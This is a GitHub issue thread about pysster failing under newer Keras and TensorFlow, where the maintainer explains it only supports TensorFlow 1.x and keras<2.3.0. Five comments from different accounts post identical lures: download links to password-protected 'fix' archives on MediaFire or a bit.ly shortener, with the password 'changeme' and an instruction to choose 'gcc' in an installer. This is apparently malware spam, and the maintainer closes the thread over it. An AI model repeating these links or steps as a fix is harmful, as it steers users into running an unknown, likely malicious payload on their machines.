### ISSUE TITLE
Issue with keras 

### ISSUE THREAD

**Issue by EYaz1** [budach/pysster#10]
Hello everyone,
I tried to run pysster as described in the example workflow, however I got the following error: `ValueError: The filepath provided must end in `.keras` (Keras model format). Received: filepath=/tmp/NKBITZFHIXLHJSN.hdf5`

Does anyone know how to solve this problem?

**Comment by budach** [comment]
Hi, which Tensorflow  and keras version are you using? Pysster is not being maintained anymore and only works with Tensorflow 1.x and keras<2.3.0

**Comment by EYaz1** [comment]
I used keras 3.4.1  and Tensorflow 2.17.0. I will try it again with the versions that you provided thank you.

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by budach** [comment]
Closing this issue, there are so many weird spam comments happening and I don't want to report them all the time to get them deleted.
